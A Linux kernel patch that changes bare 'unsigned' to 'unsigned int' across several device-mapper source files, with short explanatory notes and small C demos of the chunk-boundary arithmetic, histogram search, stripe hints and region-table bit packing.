+diff --git a/drivers/md/dm-snap.c b/drivers/md/dm-snap.c
+index d1c2f84d27e36..c64d987c544d7 100644
+--- a/drivers/md/dm-snap.c
++++ b/drivers/md/dm-snap.c
+@@ -41,7 +41,7 @@ static const char dm_snapshot_merge_target_name[] = "snapshot-merge";
+ 
+ struct dm_exception_table {
+ 	uint32_t hash_mask;
+-	unsigned hash_shift;
++	unsigned int hash_shift;
+ 	struct hlist_bl_head *table;
+ };
+ 
+@@ -106,7 +106,7 @@ struct dm_snapshot {
+ 	/* The on disk metadata handler */
+ 	struct dm_exception_store *store;
+ 
+-	unsigned in_progress;
++	unsigned int in_progress;
+ 	struct wait_queue_head in_progress_wait;
+ 
+ 	struct dm_kcopyd_client *kcopyd_client;
+@@ -161,7 +161,7 @@ struct dm_snapshot {
+  */
+ #define DEFAULT_COW_THRESHOLD 2048
+ 
+-static unsigned cow_threshold = DEFAULT_COW_THRESHOLD;
++static unsigned int cow_threshold = DEFAULT_COW_THRESHOLD;
+ module_param_named(snapshot_cow_threshold, cow_threshold, uint, 0644);
+ MODULE_PARM_DESC(snapshot_cow_threshold, "Maximum number of chunks being copied on write");
+ 
+@@ -324,7 +324,7 @@ struct origin {
+ struct dm_origin {
+ 	struct dm_dev *dev;
+ 	struct dm_target *ti;
+-	unsigned split_boundary;
++	unsigned int split_boundary;
+ 	struct list_head hash_list;
+ };
+ 
+@@ -377,7 +377,7 @@ static void exit_origin_hash(void)
+ 	kfree(_dm_origins);
+ }
+ 
+-static unsigned origin_hash(struct block_device *bdev)
++static unsigned int origin_hash(struct block_device *bdev)
+ {
+ 	return bdev->bd_dev & ORIGIN_MASK;
+ }
+@@ -652,7 +652,7 @@ static void dm_exception_table_unlock(struct dm_exception_table_lock *lock)
+ }
+ 
+ static int dm_exception_table_init(struct dm_exception_table *et,
+-				   uint32_t size, unsigned hash_shift)
++				   uint32_t size, unsigned int hash_shift)
+ {
+ 	unsigned int i;
+ 
+@@ -850,7 +850,7 @@ static int dm_add_exception(void *context, chunk_t old, chunk_t new)
+ static uint32_t __minimum_chunk_size(struct origin *o)
+ {
+ 	struct dm_snapshot *snap;
+-	unsigned chunk_size = rounddown_pow_of_two(UINT_MAX);
++	unsigned int chunk_size = rounddown_pow_of_two(UINT_MAX);
+ 
+ 	if (o)
+ 		list_for_each_entry(snap, &o->snapshots, list)
+@@ -1010,7 +1010,7 @@ out:
+ }
+ 
+ static int origin_write_extent(struct dm_snapshot *merging_snap,
+-			       sector_t sector, unsigned chunk_size);
++			       sector_t sector, unsigned int chunk_size);
+ 
+ static void merge_callback(int read_err, unsigned long write_err,
+ 			   void *context);
+@@ -1183,7 +1183,7 @@ static int parse_snapshot_features(struct dm_arg_set *as, struct dm_snapshot *s,
+ 				   struct dm_target *ti)
+ {
+ 	int r;
+-	unsigned argc;
++	unsigned int argc;
+ 	const char *arg_name;
+ 
+ 	static const struct dm_arg _args[] = {
+@@ -1241,7 +1241,7 @@ static int snapshot_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ 	int r = -EINVAL;
+ 	char *origin_path, *cow_path;
+ 	dev_t origin_dev, cow_dev;
+-	unsigned args_used, num_flush_bios = 1;
++	unsigned int args_used, num_flush_bios = 1;
+ 	fmode_t origin_mode = FMODE_READ;
+ 
+ 	if (argc < 4) {
+@@ -2315,11 +2315,11 @@ static void snapshot_merge_resume(struct dm_target *ti)
+ }
+ 
+ static void snapshot_status(struct dm_target *ti, status_type_t type,
+-			    unsigned status_flags, char *result, unsigned maxlen)
++			    unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 	struct dm_snapshot *snap = ti->private;
+-	unsigned num_features;
++	unsigned int num_features;
+ 
+ 	switch (type) {
+ 	case STATUSTYPE_INFO:
+@@ -2592,7 +2592,7 @@ again:
+  * size must be a multiple of merging_snap's chunk_size.
+  */
+ static int origin_write_extent(struct dm_snapshot *merging_snap,
+-			       sector_t sector, unsigned size)
++			       sector_t sector, unsigned int size)
+ {
+ 	int must_wait = 0;
+ 	sector_t n;
+@@ -2668,7 +2668,7 @@ static void origin_dtr(struct dm_target *ti)
+ static int origin_map(struct dm_target *ti, struct bio *bio)
+ {
+ 	struct dm_origin *o = ti->private;
+-	unsigned available_sectors;
++	unsigned int available_sectors;
+ 
+ 	bio_set_dev(bio, o->dev->bdev);
+ 
+@@ -2679,7 +2679,7 @@ static int origin_map(struct dm_target *ti, struct bio *bio)
+ 		return DM_MAPIO_REMAPPED;
+ 
+ 	available_sectors = o->split_boundary -
+-		((unsigned)bio->bi_iter.bi_sector & (o->split_boundary - 1));
++		((unsigned int)bio->bi_iter.bi_sector & (o->split_boundary - 1));
+ 
+ 	if (bio_sectors(bio) > available_sectors)
+ 		dm_accept_partial_bio(bio, available_sectors);
+@@ -2713,7 +2713,7 @@ static void origin_postsuspend(struct dm_target *ti)
+ }
+ 
+ static void origin_status(struct dm_target *ti, status_type_t type,
+-			  unsigned status_flags, char *result, unsigned maxlen)
++			  unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct dm_origin *o = ti->private;
+ 
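origin_map() above computes how many sectors fit before the next chunk boundary with "split_boundary - (sector & (split_boundary - 1))", which only works because split_boundary is a power of two: the AND extracts the offset into the current chunk. A small demo of the arithmetic with toy values:

	#include <stdio.h>

	int main(void)
	{
		unsigned int boundary = 8;	/* split_boundary, power of two */
		unsigned int sectors[] = { 0, 3, 7, 8, 13 };
		unsigned int i, avail;

		for (i = 0; i < 5; i++) {
			avail = boundary - (sectors[i] & (boundary - 1));
			printf("sector %2u: %u sector(s) left in this chunk\n",
			       sectors[i], avail);
		}
		return 0;
	}

A bio larger than the remainder is trimmed via dm_accept_partial_bio() and the rest resubmitted, so no single I/O ever straddles a chunk boundary.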
+diff --git a/drivers/md/dm-stats.c b/drivers/md/dm-stats.c
+index d12ba9bce145d..7eeb3c2a2492b 100644
+--- a/drivers/md/dm-stats.c
++++ b/drivers/md/dm-stats.c
+@@ -42,12 +42,12 @@ struct dm_stat_shared {
+ struct dm_stat {
+ 	struct list_head list_entry;
+ 	int id;
+-	unsigned stat_flags;
++	unsigned int stat_flags;
+ 	size_t n_entries;
+ 	sector_t start;
+ 	sector_t end;
+ 	sector_t step;
+-	unsigned n_histogram_entries;
++	unsigned int n_histogram_entries;
+ 	unsigned long long *histogram_boundaries;
+ 	const char *program_id;
+ 	const char *aux_data;
+@@ -63,7 +63,7 @@ struct dm_stat {
+ 
+ struct dm_stats_last_position {
+ 	sector_t last_sector;
+-	unsigned last_rw;
++	unsigned int last_rw;
+ };
+ 
+ /*
+@@ -255,8 +255,8 @@ static void dm_stats_recalc_precise_timestamps(struct dm_stats *stats)
+ }
+ 
+ static int dm_stats_create(struct dm_stats *stats, sector_t start, sector_t end,
+-			   sector_t step, unsigned stat_flags,
+-			   unsigned n_histogram_entries,
++			   sector_t step, unsigned int stat_flags,
++			   unsigned int n_histogram_entries,
+ 			   unsigned long long *histogram_boundaries,
+ 			   const char *program_id, const char *aux_data,
+ 			   void (*suspend_callback)(struct mapped_device *),
+@@ -475,11 +475,11 @@ do_sync_free:
+ }
+ 
+ static int dm_stats_list(struct dm_stats *stats, const char *program,
+-			 char *result, unsigned maxlen)
++			 char *result, unsigned int maxlen)
+ {
+ 	struct dm_stat *s;
+ 	sector_t len;
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 
+ 	/*
+ 	 * Output format:
+@@ -499,7 +499,7 @@ static int dm_stats_list(struct dm_stats *stats, const char *program,
+ 			if (s->stat_flags & STAT_PRECISE_TIMESTAMPS)
+ 				DMEMIT(" precise_timestamps");
+ 			if (s->n_histogram_entries) {
+-				unsigned i;
++				unsigned int i;
+ 				DMEMIT(" histogram:");
+ 				for (i = 0; i < s->n_histogram_entries; i++) {
+ 					if (i)
+@@ -523,7 +523,7 @@ static void dm_stat_round(struct dm_stat *s, struct dm_stat_shared *shared,
+ 	 * This is racy, but so is part_round_stats_single.
+ 	 */
+ 	unsigned long long now, difference;
+-	unsigned in_flight_read, in_flight_write;
++	unsigned int in_flight_read, in_flight_write;
+ 
+ 	if (likely(!(s->stat_flags & STAT_PRECISE_TIMESTAMPS)))
+ 		now = jiffies;
+@@ -534,8 +534,8 @@ static void dm_stat_round(struct dm_stat *s, struct dm_stat_shared *shared,
+ 	if (!difference)
+ 		return;
+ 
+-	in_flight_read = (unsigned)atomic_read(&shared->in_flight[READ]);
+-	in_flight_write = (unsigned)atomic_read(&shared->in_flight[WRITE]);
++	in_flight_read = (unsigned int)atomic_read(&shared->in_flight[READ]);
++	in_flight_write = (unsigned int)atomic_read(&shared->in_flight[WRITE]);
+ 	if (in_flight_read)
+ 		p->io_ticks[READ] += difference;
+ 	if (in_flight_write)
+@@ -596,9 +596,9 @@ static void dm_stat_for_entry(struct dm_stat *s, size_t entry,
+ 			duration = stats_aux->duration_ns;
+ 		}
+ 		if (s->n_histogram_entries) {
+-			unsigned lo = 0, hi = s->n_histogram_entries + 1;
++			unsigned int lo = 0, hi = s->n_histogram_entries + 1;
+ 			while (lo + 1 < hi) {
+-				unsigned mid = (lo + hi) / 2;
++				unsigned int mid = (lo + hi) / 2;
+ 				if (s->histogram_boundaries[mid - 1] > duration) {
+ 					hi = mid;
+ 				} else {
+@@ -656,7 +656,7 @@ static void __dm_stat_bio(struct dm_stat *s, int bi_rw,
+ }
+ 
+ void dm_stats_account_io(struct dm_stats *stats, unsigned long bi_rw,
+-			 sector_t bi_sector, unsigned bi_sectors, bool end,
++			 sector_t bi_sector, unsigned int bi_sectors, bool end,
+ 			 unsigned long start_time,
+ 			 struct dm_stats_aux *stats_aux)
+ {
+@@ -745,7 +745,7 @@ static void __dm_stat_init_temporary_percpu_totals(struct dm_stat_shared *shared
+ 		shared->tmp.io_ticks_total += READ_ONCE(p->io_ticks_total);
+ 		shared->tmp.time_in_queue += READ_ONCE(p->time_in_queue);
+ 		if (s->n_histogram_entries) {
+-			unsigned i;
++			unsigned int i;
+ 			for (i = 0; i < s->n_histogram_entries + 1; i++)
+ 				shared->tmp.histogram[i] += READ_ONCE(p->histogram[i]);
+ 		}
+@@ -779,7 +779,7 @@ static void __dm_stat_clear(struct dm_stat *s, size_t idx_start, size_t idx_end,
+ 		p->time_in_queue -= shared->tmp.time_in_queue;
+ 		local_irq_enable();
+ 		if (s->n_histogram_entries) {
+-			unsigned i;
++			unsigned int i;
+ 			for (i = 0; i < s->n_histogram_entries + 1; i++) {
+ 				local_irq_disable();
+ 				p = &s->stat_percpu[smp_processor_id()][x];
+@@ -816,7 +816,7 @@ static int dm_stats_clear(struct dm_stats *stats, int id)
+ static unsigned long long dm_jiffies_to_msec64(struct dm_stat *s, unsigned long long j)
+ {
+ 	unsigned long long result;
+-	unsigned mult;
++	unsigned int mult;
+ 
+ 	if (s->stat_flags & STAT_PRECISE_TIMESTAMPS)
+ 		return j;
+@@ -836,9 +836,9 @@ static unsigned long long dm_jiffies_to_msec64(struct dm_stat *s, unsigned long
+ 
+ static int dm_stats_print(struct dm_stats *stats, int id,
+ 			  size_t idx_start, size_t idx_len,
+-			  bool clear, char *result, unsigned maxlen)
++			  bool clear, char *result, unsigned int maxlen)
+ {
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 	struct dm_stat *s;
+ 	size_t x;
+ 	sector_t start, end, step;
+@@ -894,7 +894,7 @@ static int dm_stats_print(struct dm_stats *stats, int id,
+ 		       dm_jiffies_to_msec64(s, shared->tmp.io_ticks[READ]),
+ 		       dm_jiffies_to_msec64(s, shared->tmp.io_ticks[WRITE]));
+ 		if (s->n_histogram_entries) {
+-			unsigned i;
++			unsigned int i;
+ 			for (i = 0; i < s->n_histogram_entries + 1; i++) {
+ 				DMEMIT("%s%llu", !i ? " " : ":", shared->tmp.histogram[i]);
+ 			}
+@@ -943,11 +943,11 @@ static int dm_stats_set_aux(struct dm_stats *stats, int id, const char *aux_data
+ 	return 0;
+ }
+ 
+-static int parse_histogram(const char *h, unsigned *n_histogram_entries,
++static int parse_histogram(const char *h, unsigned int *n_histogram_entries,
+ 			   unsigned long long **histogram_boundaries)
+ {
+ 	const char *q;
+-	unsigned n;
++	unsigned int n;
+ 	unsigned long long last;
+ 
+ 	*n_histogram_entries = 1;
+@@ -982,23 +982,23 @@ static int parse_histogram(const char *h, unsigned *n_histogram_entries,
+ }
+ 
+ static int message_stats_create(struct mapped_device *md,
+-				unsigned argc, char **argv,
+-				char *result, unsigned maxlen)
++				unsigned int argc, char **argv,
++				char *result, unsigned int maxlen)
+ {
+ 	int r;
+ 	int id;
+ 	char dummy;
+ 	unsigned long long start, end, len, step;
+-	unsigned divisor;
++	unsigned int divisor;
+ 	const char *program_id, *aux_data;
+-	unsigned stat_flags = 0;
++	unsigned int stat_flags = 0;
+ 
+-	unsigned n_histogram_entries = 0;
++	unsigned int n_histogram_entries = 0;
+ 	unsigned long long *histogram_boundaries = NULL;
+ 
+ 	struct dm_arg_set as, as_backup;
+ 	const char *a;
+-	unsigned feature_args;
++	unsigned int feature_args;
+ 
+ 	/*
+ 	 * Input format:
+@@ -1107,7 +1107,7 @@ ret:
+ }
+ 
+ static int message_stats_delete(struct mapped_device *md,
+-				unsigned argc, char **argv)
++				unsigned int argc, char **argv)
+ {
+ 	int id;
+ 	char dummy;
+@@ -1122,7 +1122,7 @@ static int message_stats_delete(struct mapped_device *md,
+ }
+ 
+ static int message_stats_clear(struct mapped_device *md,
+-			       unsigned argc, char **argv)
++			       unsigned int argc, char **argv)
+ {
+ 	int id;
+ 	char dummy;
+@@ -1137,8 +1137,8 @@ static int message_stats_clear(struct mapped_device *md,
+ }
+ 
+ static int message_stats_list(struct mapped_device *md,
+-			      unsigned argc, char **argv,
+-			      char *result, unsigned maxlen)
++			      unsigned int argc, char **argv,
++			      char *result, unsigned int maxlen)
+ {
+ 	int r;
+ 	const char *program = NULL;
+@@ -1160,8 +1160,8 @@ static int message_stats_list(struct mapped_device *md,
+ }
+ 
+ static int message_stats_print(struct mapped_device *md,
+-			       unsigned argc, char **argv, bool clear,
+-			       char *result, unsigned maxlen)
++			       unsigned int argc, char **argv, bool clear,
++			       char *result, unsigned int maxlen)
+ {
+ 	int id;
+ 	char dummy;
+@@ -1187,7 +1187,7 @@ static int message_stats_print(struct mapped_device *md,
+ }
+ 
+ static int message_stats_set_aux(struct mapped_device *md,
+-				 unsigned argc, char **argv)
++				 unsigned int argc, char **argv)
+ {
+ 	int id;
+ 	char dummy;
+@@ -1201,8 +1201,8 @@ static int message_stats_set_aux(struct mapped_device *md,
+ 	return dm_stats_set_aux(dm_get_stats(md), id, argv[2]);
+ }
+ 
+-int dm_stats_message(struct mapped_device *md, unsigned argc, char **argv,
+-		     char *result, unsigned maxlen)
++int dm_stats_message(struct mapped_device *md, unsigned int argc, char **argv,
++		     char *result, unsigned int maxlen)
+ {
+ 	int r;
+ 
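The lo/hi/mid loop in dm_stat_for_entry() above is a binary search over the histogram boundaries: n boundaries define n + 1 buckets, and the search converges on the bucket whose range contains the measured duration. A standalone version of that search, with invented names:

	#include <stddef.h>

	/* returns a bucket index in [0, n_bounds] */
	static size_t histogram_bucket(const unsigned long long *bounds,
				       size_t n_bounds, unsigned long long duration)
	{
		size_t lo = 0, hi = n_bounds + 1;

		while (lo + 1 < hi) {
			size_t mid = (lo + hi) / 2;

			if (bounds[mid - 1] > duration)
				hi = mid;	/* duration falls below this boundary */
			else
				lo = mid;	/* at or above it, search upwards */
		}
		return lo;
	}

With bounds {10, 100}, a duration of 5 lands in bucket 0, 10 in bucket 1, and 500 in bucket 2, matching the "greater than or equal to the lower boundary, below the upper" semantics the parser in parse_histogram() enforces by requiring strictly increasing boundaries.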
+diff --git a/drivers/md/dm-stats.h b/drivers/md/dm-stats.h
+index ee32b099f1cf7..c6728c8b41594 100644
+--- a/drivers/md/dm-stats.h
++++ b/drivers/md/dm-stats.h
+@@ -26,11 +26,11 @@ void dm_stats_cleanup(struct dm_stats *st);
+ 
+ struct mapped_device;
+ 
+-int dm_stats_message(struct mapped_device *md, unsigned argc, char **argv,
+-		     char *result, unsigned maxlen);
++int dm_stats_message(struct mapped_device *md, unsigned int argc, char **argv,
++		     char *result, unsigned int maxlen);
+ 
+ void dm_stats_account_io(struct dm_stats *stats, unsigned long bi_rw,
+-			 sector_t bi_sector, unsigned bi_sectors, bool end,
++			 sector_t bi_sector, unsigned int bi_sectors, bool end,
+ 			 unsigned long start_time,
+ 			 struct dm_stats_aux *aux);
+ 
+diff --git a/drivers/md/dm-stripe.c b/drivers/md/dm-stripe.c
+index baa085cc67bde..a81ed080730a7 100644
+--- a/drivers/md/dm-stripe.c
++++ b/drivers/md/dm-stripe.c
+@@ -273,7 +273,7 @@ static int stripe_map(struct dm_target *ti, struct bio *bio)
+ {
+ 	struct stripe_c *sc = ti->private;
+ 	uint32_t stripe;
+-	unsigned target_bio_nr;
++	unsigned int target_bio_nr;
+ 
+ 	if (bio->bi_opf & REQ_PREFLUSH) {
+ 		target_bio_nr = dm_bio_get_target_bio_nr(bio);
+@@ -359,7 +359,7 @@ static size_t stripe_dax_recovery_write(struct dm_target *ti, pgoff_t pgoff,
+  */
+ 
+ static void stripe_status(struct dm_target *ti, status_type_t type,
+-			  unsigned status_flags, char *result, unsigned maxlen)
++			  unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct stripe_c *sc = (struct stripe_c *) ti->private;
+ 	unsigned int sz = 0;
+@@ -406,7 +406,7 @@ static void stripe_status(struct dm_target *ti, status_type_t type,
+ static int stripe_end_io(struct dm_target *ti, struct bio *bio,
+ 		blk_status_t *error)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	char major_minor[16];
+ 	struct stripe_c *sc = ti->private;
+ 
+@@ -444,7 +444,7 @@ static int stripe_iterate_devices(struct dm_target *ti,
+ {
+ 	struct stripe_c *sc = ti->private;
+ 	int ret = 0;
+-	unsigned i = 0;
++	unsigned int i = 0;
+ 
+ 	do {
+ 		ret = fn(ti, sc->stripe[i].dev,
+@@ -459,7 +459,7 @@ static void stripe_io_hints(struct dm_target *ti,
+ 			    struct queue_limits *limits)
+ {
+ 	struct stripe_c *sc = ti->private;
+-	unsigned chunk_size = sc->chunk_size << SECTOR_SHIFT;
++	unsigned int chunk_size = sc->chunk_size << SECTOR_SHIFT;
+ 
+ 	blk_limits_io_min(limits, chunk_size);
+ 	blk_limits_io_opt(limits, chunk_size * sc->stripes);
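
For context on the stripe_io_hints() hunk above: the chunk size is kept in 512-byte sectors and converted to bytes with << SECTOR_SHIFT before being handed to the block layer as io_min, with io_opt covering one full stripe. A sketch of the arithmetic, with made-up chunk and stripe values:

#include <stdio.h>
#include <stdint.h>

#define SECTOR_SHIFT 9	/* 512-byte sectors */

int main(void)
{
	uint32_t chunk_sectors = 256;	/* assumed: 128 KiB chunks */
	unsigned int stripes = 4;	/* assumed: 4-disk stripe set */

	unsigned int io_min = chunk_sectors << SECTOR_SHIFT;	/* one chunk, in bytes */
	unsigned int io_opt = io_min * stripes;			/* one full stripe, in bytes */

	printf("io_min=%u io_opt=%u\n", io_min, io_opt);	/* 131072 524288 */
	return 0;
}
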
+diff --git a/drivers/md/dm-switch.c b/drivers/md/dm-switch.c
+index 534dc2ca8bb06..f734b5a097443 100644
+--- a/drivers/md/dm-switch.c
++++ b/drivers/md/dm-switch.c
+@@ -38,9 +38,9 @@ struct switch_path {
+ struct switch_ctx {
+ 	struct dm_target *ti;
+ 
+-	unsigned nr_paths;		/* Number of paths in path_list. */
++	unsigned int nr_paths;		/* Number of paths in path_list. */
+ 
+-	unsigned region_size;		/* Region size in 512-byte sectors */
++	unsigned int region_size;		/* Region size in 512-byte sectors */
+ 	unsigned long nr_regions;	/* Number of regions making up the device */
+ 	signed char region_size_bits;	/* log2 of region_size or -1 */
+ 
+@@ -56,8 +56,8 @@ struct switch_ctx {
+ 	struct switch_path path_list[];
+ };
+ 
+-static struct switch_ctx *alloc_switch_ctx(struct dm_target *ti, unsigned nr_paths,
+-					   unsigned region_size)
++static struct switch_ctx *alloc_switch_ctx(struct dm_target *ti, unsigned int nr_paths,
++					   unsigned int region_size)
+ {
+ 	struct switch_ctx *sctx;
+ 
+@@ -73,7 +73,7 @@ static struct switch_ctx *alloc_switch_ctx(struct dm_target *ti, unsigned nr_pat
+ 	return sctx;
+ }
+ 
+-static int alloc_region_table(struct dm_target *ti, unsigned nr_paths)
++static int alloc_region_table(struct dm_target *ti, unsigned int nr_paths)
+ {
+ 	struct switch_ctx *sctx = ti->private;
+ 	sector_t nr_regions = ti->len;
+@@ -124,7 +124,7 @@ static int alloc_region_table(struct dm_target *ti, unsigned nr_paths)
+ }
+ 
+ static void switch_get_position(struct switch_ctx *sctx, unsigned long region_nr,
+-				unsigned long *region_index, unsigned *bit)
++				unsigned long *region_index, unsigned int *bit)
+ {
+ 	if (sctx->region_entries_per_slot_bits >= 0) {
+ 		*region_index = region_nr >> sctx->region_entries_per_slot_bits;
+@@ -137,10 +137,10 @@ static void switch_get_position(struct switch_ctx *sctx, unsigned long region_nr
+ 	*bit *= sctx->region_table_entry_bits;
+ }
+ 
+-static unsigned switch_region_table_read(struct switch_ctx *sctx, unsigned long region_nr)
++static unsigned int switch_region_table_read(struct switch_ctx *sctx, unsigned long region_nr)
+ {
+ 	unsigned long region_index;
+-	unsigned bit;
++	unsigned int bit;
+ 
+ 	switch_get_position(sctx, region_nr, &region_index, &bit);
+ 
+@@ -151,9 +151,9 @@ static unsigned switch_region_table_read(struct switch_ctx *sctx, unsigned long
+ /*
+  * Find which path to use at given offset.
+  */
+-static unsigned switch_get_path_nr(struct switch_ctx *sctx, sector_t offset)
++static unsigned int switch_get_path_nr(struct switch_ctx *sctx, sector_t offset)
+ {
+-	unsigned path_nr;
++	unsigned int path_nr;
+ 	sector_t p;
+ 
+ 	p = offset;
+@@ -172,10 +172,10 @@ static unsigned switch_get_path_nr(struct switch_ctx *sctx, sector_t offset)
+ }
+ 
+ static void switch_region_table_write(struct switch_ctx *sctx, unsigned long region_nr,
+-				      unsigned value)
++				      unsigned int value)
+ {
+ 	unsigned long region_index;
+-	unsigned bit;
++	unsigned int bit;
+ 	region_table_slot_t pte;
+ 
+ 	switch_get_position(sctx, region_nr, &region_index, &bit);
+@@ -191,7 +191,7 @@ static void switch_region_table_write(struct switch_ctx *sctx, unsigned long reg
+  */
+ static void initialise_region_table(struct switch_ctx *sctx)
+ {
+-	unsigned path_nr = 0;
++	unsigned int path_nr = 0;
+ 	unsigned long region_nr;
+ 
+ 	for (region_nr = 0; region_nr < sctx->nr_regions; region_nr++) {
+@@ -249,7 +249,7 @@ static void switch_dtr(struct dm_target *ti)
+  * Optional args are to allow for future extension: currently this
+  * parameter must be 0.
+  */
+-static int switch_ctr(struct dm_target *ti, unsigned argc, char **argv)
++static int switch_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ {
+ 	static const struct dm_arg _args[] = {
+ 		{1, (KMALLOC_MAX_SIZE - sizeof(struct switch_ctx)) / sizeof(struct switch_path), "Invalid number of paths"},
+@@ -259,7 +259,7 @@ static int switch_ctr(struct dm_target *ti, unsigned argc, char **argv)
+ 
+ 	struct switch_ctx *sctx;
+ 	struct dm_arg_set as;
+-	unsigned nr_paths, region_size, nr_optional_args;
++	unsigned int nr_paths, region_size, nr_optional_args;
+ 	int r;
+ 
+ 	as.argc = argc;
+@@ -320,7 +320,7 @@ static int switch_map(struct dm_target *ti, struct bio *bio)
+ {
+ 	struct switch_ctx *sctx = ti->private;
+ 	sector_t offset = dm_target_offset(ti, bio->bi_iter.bi_sector);
+-	unsigned path_nr = switch_get_path_nr(sctx, offset);
++	unsigned int path_nr = switch_get_path_nr(sctx, offset);
+ 
+ 	bio_set_dev(bio, sctx->path_list[path_nr].dmdev->bdev);
+ 	bio->bi_iter.bi_sector = sctx->path_list[path_nr].start + offset;
+@@ -371,9 +371,9 @@ static __always_inline unsigned long parse_hex(const char **string)
+ }
+ 
+ static int process_set_region_mappings(struct switch_ctx *sctx,
+-				       unsigned argc, char **argv)
++				       unsigned int argc, char **argv)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	unsigned long region_index = 0;
+ 
+ 	for (i = 1; i < argc; i++) {
+@@ -466,8 +466,8 @@ static int process_set_region_mappings(struct switch_ctx *sctx,
+  *
+  * Only set_region_mappings is supported.
+  */
+-static int switch_message(struct dm_target *ti, unsigned argc, char **argv,
+-			  char *result, unsigned maxlen)
++static int switch_message(struct dm_target *ti, unsigned int argc, char **argv,
++			  char *result, unsigned int maxlen)
+ {
+ 	static DEFINE_MUTEX(message_mutex);
+ 
+@@ -487,10 +487,10 @@ static int switch_message(struct dm_target *ti, unsigned argc, char **argv,
+ }
+ 
+ static void switch_status(struct dm_target *ti, status_type_t type,
+-			  unsigned status_flags, char *result, unsigned maxlen)
++			  unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct switch_ctx *sctx = ti->private;
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 	int path_nr;
+ 
+ 	switch (type) {
+@@ -519,7 +519,7 @@ static void switch_status(struct dm_target *ti, status_type_t type,
+ static int switch_prepare_ioctl(struct dm_target *ti, struct block_device **bdev)
+ {
+ 	struct switch_ctx *sctx = ti->private;
+-	unsigned path_nr;
++	unsigned int path_nr;
+ 
+ 	path_nr = switch_get_path_nr(sctx, 0);
+ 
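
The dm-switch hunks above are all over one data structure: switch_get_position() and switch_region_table_read()/switch_region_table_write() implement a bit-packed array, where each region's path number occupies region_table_entry_bits bits of a slot word. The following standalone sketch shows the same packing, assuming fixed 4-bit entries that never straddle a 64-bit slot (dm-switch guarantees the same by choosing entries-per-slot accordingly):

#include <stdio.h>
#include <stdint.h>

#define ENTRY_BITS	4	/* bits per path number (assumed) */
#define SLOT_BITS	64
#define ENTRIES_PER_SLOT (SLOT_BITS / ENTRY_BITS)

static unsigned int table_read(const uint64_t *table, unsigned long region_nr)
{
	unsigned long slot = region_nr / ENTRIES_PER_SLOT;
	unsigned int bit = (region_nr % ENTRIES_PER_SLOT) * ENTRY_BITS;

	return (table[slot] >> bit) & ((1ULL << ENTRY_BITS) - 1);
}

static void table_write(uint64_t *table, unsigned long region_nr, unsigned int value)
{
	unsigned long slot = region_nr / ENTRIES_PER_SLOT;
	unsigned int bit = (region_nr % ENTRIES_PER_SLOT) * ENTRY_BITS;
	uint64_t mask = ((1ULL << ENTRY_BITS) - 1) << bit;

	table[slot] = (table[slot] & ~mask) | ((uint64_t)value << bit);
}

int main(void)
{
	uint64_t table[2] = { 0 };

	table_write(table, 17, 5);
	printf("%u\n", table_read(table, 17));	/* 5 */
	return 0;
}

The kernel version additionally supports non-power-of-two entry widths via region_size_bits == -1 fallbacks, omitted here.
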
+diff --git a/drivers/md/dm-table.c b/drivers/md/dm-table.c
+index 8541d5688f3a6..c571f2385b57f 100644
+--- a/drivers/md/dm-table.c
++++ b/drivers/md/dm-table.c
+@@ -126,7 +126,7 @@ static int alloc_targets(struct dm_table *t, unsigned int num)
+ }
+ 
+ int dm_table_create(struct dm_table **result, fmode_t mode,
+-		    unsigned num_targets, struct mapped_device *md)
++		    unsigned int num_targets, struct mapped_device *md)
+ {
+ 	struct dm_table *t = kzalloc(sizeof(*t), GFP_KERNEL);
+ 
+@@ -470,10 +470,10 @@ static int adjoin(struct dm_table *t, struct dm_target *ti)
+  * On the other hand, dm-switch needs to process bulk data using messages and
+  * excessive use of GFP_NOIO could cause trouble.
+  */
+-static char **realloc_argv(unsigned *size, char **old_argv)
++static char **realloc_argv(unsigned int *size, char **old_argv)
+ {
+ 	char **argv;
+-	unsigned new_size;
++	unsigned int new_size;
+ 	gfp_t gfp;
+ 
+ 	if (*size) {
+@@ -499,7 +499,7 @@ static char **realloc_argv(unsigned *size, char **old_argv)
+ int dm_split_args(int *argc, char ***argvp, char *input)
+ {
+ 	char *start, *end = input, *out, **argv = NULL;
+-	unsigned array_size = 0;
++	unsigned int array_size = 0;
+ 
+ 	*argc = 0;
+ 
+@@ -732,9 +732,8 @@ int dm_table_add_target(struct dm_table *t, const char *type,
+ /*
+  * Target argument parsing helpers.
+  */
+-static int validate_next_arg(const struct dm_arg *arg,
+-			     struct dm_arg_set *arg_set,
+-			     unsigned *value, char **error, unsigned grouped)
++static int validate_next_arg(const struct dm_arg *arg, struct dm_arg_set *arg_set,
++			     unsigned int *value, char **error, unsigned int grouped)
+ {
+ 	const char *arg_str = dm_shift_arg(arg_set);
+ 	char dummy;
+@@ -752,14 +751,14 @@ static int validate_next_arg(const struct dm_arg *arg,
+ }
+ 
+ int dm_read_arg(const struct dm_arg *arg, struct dm_arg_set *arg_set,
+-		unsigned *value, char **error)
++		unsigned int *value, char **error)
+ {
+ 	return validate_next_arg(arg, arg_set, value, error, 0);
+ }
+ EXPORT_SYMBOL(dm_read_arg);
+ 
+ int dm_read_arg_group(const struct dm_arg *arg, struct dm_arg_set *arg_set,
+-		      unsigned *value, char **error)
++		      unsigned int *value, char **error)
+ {
+ 	return validate_next_arg(arg, arg_set, value, error, 1);
+ }
+@@ -780,7 +779,7 @@ const char *dm_shift_arg(struct dm_arg_set *as)
+ }
+ EXPORT_SYMBOL(dm_shift_arg);
+ 
+-void dm_consume_args(struct dm_arg_set *as, unsigned num_args)
++void dm_consume_args(struct dm_arg_set *as, unsigned int num_args)
+ {
+ 	BUG_ON(as->argc < num_args);
+ 	as->argc -= num_args;
+@@ -856,7 +855,7 @@ static int device_is_rq_stackable(struct dm_target *ti, struct dm_dev *dev,
+ 
+ static int dm_table_determine_type(struct dm_table *t)
+ {
+-	unsigned bio_based = 0, request_based = 0, hybrid = 0;
++	unsigned int bio_based = 0, request_based = 0, hybrid = 0;
